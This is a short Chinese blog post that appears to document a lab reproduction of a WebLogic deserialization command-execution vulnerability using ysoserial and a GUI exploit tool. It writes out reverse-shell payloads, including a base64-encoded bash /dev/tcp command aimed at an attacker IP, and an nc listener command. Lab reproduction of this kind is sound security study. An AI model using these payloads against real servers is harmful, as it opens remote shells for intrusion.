🗒️weblogic 反序列化命令执行漏洞
2022-8-7
| 2023-10-29
字数 268阅读时长 1 分钟
type
status
date
slug
summary
tags
category
icon
password

反序列化命令执行漏洞

影响版本

与weblogic的任意文件上传漏洞影响版本相同:

复现过程

工具下载

下载反序列化漏洞利用工具jar文件:ysoserial.jar
地址:https://github.com/frohoff/ysoserial。按照说明生成jar文件即可。
kali机ip: 192.168.110.131(攻击机)
靶机ip: 192.168.110.132

1. 反弹shell payload准备:

bash -i >& /dev/tcp/远端vps-ip/88880>&1
bash -i >& /dev/tcp/192.168.110.131/8888 0>&1
由于Runtime.getRuntime().exec() 中不能使用管道符等bash需要的方法,所以我们使用base64的反弹shell形式,具体如下:
bash -c {echo,上面反弹shell的base64编码}|{base64,-d}|{bash,-i}
bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjExMC4xMzEvODg4OCAwPiYx}|{base64,-d}|{bash,-i}

2. 远端vps监听端口:

nc -lnvp 8888

3. 远端vps开启JRMP Server端口监听,端口随意,这里设置为38080

kali机ip: 192.168.110.131
notion image
出现Opening JRMP listener on 38080即表明jrmp server监听成功。

4. 使用工具WeblogicExploit-GUI

notion image
点击执行后,成功植入getshell
notion image
  • 漏洞复现
  • weblogic任意文件漏洞复现weblogic XML Decoder反序列化漏洞
    Loading...